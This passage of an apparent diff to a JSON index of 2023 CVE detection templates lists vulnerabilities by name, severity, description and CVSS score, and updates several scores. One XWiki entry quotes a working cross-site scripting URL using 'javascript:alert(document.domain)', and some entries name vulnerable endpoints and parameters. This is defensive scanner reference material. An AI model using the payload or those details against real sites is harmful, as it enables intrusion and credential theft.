device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20073.yaml"} {"ID":"CVE-2023-2009","Info":{"Name":"Pretty Url \u003c= 1.5.4 - Cross-Site Scripting","Severity":"medium","Description":"Plugin does not sanitize and escape the URL field in the plugin settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2009.yaml"} {"ID":"CVE-2023-20198","Info":{"Name":"Cisco IOS XE - Authentication Bypass","Severity":"critical","Description":"Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system.\nFor steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory.\nCisco will provide updates on the status of this investigation and when a software patch is available.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-20198.yaml"} {"ID":"CVE-2023-2023","Info":{"Name":"Custom 404 Pro \u003c 3.7.3 - Cross-Site Scripting","Severity":"medium","Description":"Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2023.yaml"} +{"ID":"CVE-2023-2059","Info":{"Name":"DedeCMS 5.7.87 - Directory Traversal","Severity":"medium","Description":"Directory traversal vulnerability in DedeCMS 5.7.87 allows reading sensitive files via the $activepath parameter.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-2059.yaml"} {"ID":"CVE-2023-20864","Info":{"Name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","Severity":"critical","Description":"VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20864.yaml"} {"ID":"CVE-2023-20887","Info":{"Name":"VMware VRealize Network Insight - Remote Code Execution","Severity":"critical","Description":"VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are\n vulnerable.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20887.yaml"} {"ID":"CVE-2023-20888","Info":{"Name":"VMware Aria Operations for Networks - Remote Code Execution","Severity":"high","Description":"Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-20888.yaml"} @@ -2129,6 +2134,7 @@ {"ID":"CVE-2023-30258","Info":{"Name":"MagnusBilling - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-30258.yaml"} {"ID":"CVE-2023-30534","Info":{"Name":"Cacti \u003c 1.2.25 Insecure Deserialization","Severity":"medium","Description":"Cacti is an open source operational monitoring and fault management framework. There are two instances of insecure deserialization in Cacti version 1.2.24.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2023/CVE-2023-30534.yaml"} {"ID":"CVE-2023-30625","Info":{"Name":"Rudder Server \u003c 1.3.0-rc.1 - SQL Injection","Severity":"high","Description":"Rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-30625.yaml"} +{"ID":"CVE-2023-3077","Info":{"Name":"MStore API \u003c 3.9.8 - SQL Injection","Severity":"critical","Description":"The MStore API WordPress plugin before 3.9.8 is vulnerable to Blind SQL injection via the product_id parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3077.yaml"} {"ID":"CVE-2023-30777","Info":{"Name":"Advanced Custom Fields \u003c 6.1.6 - Cross-Site Scripting","Severity":"medium","Description":"Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30777.yaml"} {"ID":"CVE-2023-30868","Info":{"Name":"Tree Page View Plugin \u003c 1.6.7 - Cross-Site Scripting","Severity":"medium","Description":"The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30868.yaml"} {"ID":"CVE-2023-30943","Info":{"Name":"Moodle - Cross-Site Scripting/Remote Code Execution","Severity":"medium","Description":"The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system. Moodle versions 4.1.x before 4.1.3 and 4.2.x before 4.2.0 are susceptible to an unauthenticated arbitrary folder creation, tracked as CVE-2023-30943. An attacker can leverage the creation of arbitrary folders to carry out a Stored Cross-Site Scripting (XSS) attack on the administration panel, resulting in arbitrary code execution on the server as soon as an administrator visits the panel.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-30943.yaml"} @@ -2154,7 +2160,7 @@ {"ID":"CVE-2023-33629","Info":{"Name":"H3C Magic R300-2100M - Remote Code Execution","Severity":"high","Description":"H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33629.yaml"} {"ID":"CVE-2023-3368","Info":{"Name":"Chamilo LMS \u003c= v1.11.20 Unauthenticated Command Injection","Severity":"critical","Description":"Command injection in `/main/webservices/additional_webservices.php`\nin Chamilo LMS \u003c= v1.11.20 allows unauthenticated attackers to obtain\nremote code execution via improper neutralisation of special characters.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3368.yaml"} {"ID":"CVE-2023-33831","Info":{"Name":"FUXA - Unauthenticated Remote Code Execution","Severity":"critical","Description":"A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33831.yaml"} -{"ID":"CVE-2023-34020","Info":{"Name":"Uncanny Toolkit for LearnDash - Open Redirection","Severity":"low","Description":"A vulnerability in the WordPress Uncanny Toolkit for LearnDash Plugin allowed malicious actors to redirect users, posing a potential risk of phishing incidents. The issue has been resolved in version 3.6.4.4, and users are urged to update for security.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34020.yaml"} +{"ID":"CVE-2023-34020","Info":{"Name":"Uncanny Toolkit for LearnDash - Open Redirection","Severity":"medium","Description":"A vulnerability in the WordPress Uncanny Toolkit for LearnDash Plugin allowed malicious actors to redirect users, posing a potential risk of phishing incidents. The issue has been resolved in version 3.6.4.4, and users are urged to update for security.\n","Classification":{"CVSSScore":"4.7"}},"file_path":"http/cves/2023/CVE-2023-34020.yaml"} {"ID":"CVE-2023-34124","Info":{"Name":"SonicWall GMS and Analytics Web Services - Shell Injection","Severity":"critical","Description":"The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34124.yaml"} {"ID":"CVE-2023-34192","Info":{"Name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","Severity":"critical","Description":"Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function.\n","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2023/CVE-2023-34192.yaml"} {"ID":"CVE-2023-34259","Info":{"Name":"Kyocera TASKalfa printer - Path Traversal","Severity":"medium","Description":"CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings.\n","Classification":{"CVSSScore":"4.9"}},"file_path":"http/cves/2023/CVE-2023-34259.yaml"} @@ -2172,10 +2178,11 @@ {"ID":"CVE-2023-3479","Info":{"Name":"Hestiacp \u003c= 1.7.7 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3479.yaml"} {"ID":"CVE-2023-34843","Info":{"Name":"Traggo Server - Local File Inclusion","Severity":"high","Description":"traggo/server version 0.3.0 is vulnerable to directory traversal.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-34843.yaml"} {"ID":"CVE-2023-34960","Info":{"Name":"Chamilo Command Injection","Severity":"critical","Description":"A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34960.yaml"} -{"ID":"CVE-2023-34993","Info":{"Name":"Fortinet FortiWLM Unauthenticated Command Injection Vulnerability","Severity":"critical","Description":"A improper neutralization of special elements used in an os command ('os\ncommand injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and\n8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands\nSuccessful exploitation of this vulnerability could allow an attacker to\nbypass authentication and gain unauthorized access to the affected system.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34993.yaml"} +{"ID":"CVE-2023-34993","Info":{"Name":"Fortinet FortiWLM Unauthenticated Command Injection Vulnerability","Severity":"critical","Description":"A improper neutralization of special elements used in an os command ('os\ncommand injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and\n8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands\nSuccessful exploitation of this vulnerability could allow an attacker to\nbypass authentication and gain unauthorized access to the affected system.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34993.yaml"} {"ID":"CVE-2023-35078","Info":{"Name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35078.yaml"} {"ID":"CVE-2023-35082","Info":{"Name":"MobileIron Core - Remote Unauthenticated API Access","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35082.yaml"} {"ID":"CVE-2023-35158","Info":{"Name":"XWiki - Cross-Site Scripting","Severity":"medium","Description":"XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the restore template to perform a XSS, e.g. by using URL such as: \u003e /xwiki/bin/view/XWiki/Main?xpage=restore\u0026showBatch=true\u0026xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 9.4-rc-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-35158.yaml"} +{"ID":"CVE-2023-35162","Info":{"Name":"XWiki \u003c 14.10.5 - Cross-Site Scripting","Severity":"medium","Description":"XWiki Platform is vulnerable to reflected XSS via the previewactions template. An attacker can inject JavaScript through the xcontinue parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-35162.yaml"} {"ID":"CVE-2023-35813","Info":{"Name":"Sitecore - Remote Code Execution","Severity":"critical","Description":"Multiple Sitecore products allow remote code execution. This affects Experience Manager, Experience Platform, and Experience Commerce through 10.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35813.yaml"} {"ID":"CVE-2023-35843","Info":{"Name":"NocoDB version \u003c= 0.106.1 - Arbitrary File Read","Severity":"high","Description":"NocoDB through 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35843.yaml"} {"ID":"CVE-2023-35844","Info":{"Name":"Lightdash version \u003c= 0.510.3 Arbitrary File Read","Severity":"high","Description":"packages/backend/src/routers in Lightdash before 0.510.3\nhas insecure file endpoints, e.g., they allow .. directory\ntraversal and do not ensure that an intended file extension\n(.csv or .png) is used.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35844.yaml"} @@ -2203,6 +2210,7 @@ {"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"} {"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"} {"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"} +{"ID":"CVE-2023-38194","Info":{"Name":"SuperWebMailer - Cross-Site Scripting","Severity":"medium","Description":"An issue was discovered in SuperWebMailer 9.00.0.01710 that allows keepalive.php XSS via a GET parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-38194.yaml"} {"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion - Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"} {"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"} {"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"} @@ -2266,6 +2274,7 @@ {"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"} {"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"} {"ID":"CVE-2023-43374","Info":{"Name":"Hoteldruid v3.0.5 - SQL Injection","Severity":"critical","Description":"Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43374.yaml"} +{"ID":"CVE-2023-43472","Info":{"Name":"MLFlow \u003c 2.8.1 - Sensitive Information Disclosure","Severity":"high","Description":"An issue in MLFlow versions 2.8.1 and before allows a remote attacker to obtain sensitive information via a crafted request to REST API.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43472.yaml"} {"ID":"CVE-2023-43795","Info":{"Name":"GeoServer WPS - Server Side Request Forgery","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43795.yaml"} {"ID":"CVE-2023-4415","Info":{"Name":"Ruijie RG-EW1200G Router Background - Login Bypass","Severity":"high","Description":"A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-4415.yaml"} {"ID":"CVE-2023-44352","Info":{"Name":"Adobe Coldfusion - Cross-Site Scripting","Severity":"medium","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44352.yaml"} @@ -2285,18 +2294,19 @@ {"ID":"CVE-2023-4596","Info":{"Name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","Severity":"critical","Description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4596.yaml"} {"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"} {"ID":"CVE-2023-46347","Info":{"Name":"PrestaShop Step by Step products Pack - SQL Injection","Severity":"critical","Description":"In the module “Step by Step products Pack” (ndk_steppingpack) up to 1.5.6 from NDK Design for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46347.yaml"} -{"ID":"CVE-2023-46359","Info":{"Name":"cPH2 Charging Station v1.87.0 - OS Command Injection","Severity":"critical","Description":"An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2023/CVE-2023-46359.yaml"} +{"ID":"CVE-2023-46359","Info":{"Name":"cPH2 Charging Station v1.87.0 - OS Command Injection","Severity":"critical","Description":"An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46359.yaml"} {"ID":"CVE-2023-46574","Info":{"Name":"TOTOLINK A3700R - Command Injection","Severity":"critical","Description":"An issue in TOTOLINK A3700R v.9.1.2u.6165_20211012 allows a remote attacker to execute arbitrary code via the FileName parameter of the UploadFirmwareFile function.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46574.yaml"} {"ID":"CVE-2023-46747","Info":{"Name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","Severity":"critical","Description":"CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46747.yaml"} {"ID":"CVE-2023-46805","Info":{"Name":"Ivanti ICS - Authentication Bypass","Severity":"high","Description":"An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2023/CVE-2023-46805.yaml"} {"ID":"CVE-2023-47115","Info":{"Name":"Label Studio - Cross-Site Scripting","Severity":"high","Description":"Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website.\n","Classification":{"CVSSScore":"7.1"}},"file_path":"http/cves/2023/CVE-2023-47115.yaml"} {"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"} {"ID":"CVE-2023-47211","Info":{"Name":"ManageEngine OpManager - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-47211.yaml"} -{"ID":"CVE-2023-47218","Info":{"Name":"QNAP QTS and QuTS Hero - OS Command Injection","Severity":"high","Description":"An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2023/CVE-2023-47218.yaml"} +{"ID":"CVE-2023-47218","Info":{"Name":"QNAP QTS and QuTS Hero - OS Command Injection","Severity":"medium","Description":"An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2023/CVE-2023-47218.yaml"} {"ID":"CVE-2023-47246","Info":{"Name":"SysAid Server - Remote Code Execution","Severity":"critical","Description":"In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-47246.yaml"} {"ID":"CVE-2023-47643","Info":{"Name":"SuiteCRM Unauthenticated Graphql Introspection","Severity":"medium","Description":"Graphql Introspection is enabled without authentication, exposing the scheme defining all object types, arguments, and functions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-47643.yaml"} {"ID":"CVE-2023-48023","Info":{"Name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","Severity":"high","Description":"The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-48023.yaml"} -{"ID":"CVE-2023-48777","Info":{"Name":"WordPress Elementor 3.18.1 - File Upload/Remote Code Execution","Severity":"critical","Description":"The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-48777.yaml"} +{"ID":"CVE-2023-48084","Info":{"Name":"Nagios XI \u003c 5.11.3 - SQL Injection","Severity":"critical","Description":"SQL injection vulnerability in Nagios XI before version 5.11.3 via the bulk modification tool.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-48084.yaml"} +{"ID":"CVE-2023-48777","Info":{"Name":"WordPress Elementor 3.18.1 - File Upload/Remote Code Execution","Severity":"critical","Description":"The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2023/CVE-2023-48777.yaml"} {"ID":"CVE-2023-49070","Info":{"Name":"Apache OFBiz \u003c 18.12.10 - Arbitrary Code Execution","Severity":"critical","Description":"Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-49070.yaml"} {"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"} {"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"} @@ -2323,28 +2333,31 @@ {"ID":"CVE-2023-6021","Info":{"Name":"Ray API - Local File Inclusion","Severity":"high","Description":"LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6021.yaml"} {"ID":"CVE-2023-6023","Info":{"Name":"VertaAI ModelDB - Path Traversal","Severity":"high","Description":"The endpoint \"/api/v1/artifact/getArtifact?artifact_path=\" is vulnerable to path traversal. The main cause of this vulnerability is due to the lack of validation and sanitization of the artifact_path parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6023.yaml"} {"ID":"CVE-2023-6038","Info":{"Name":"H2O ImportFiles - 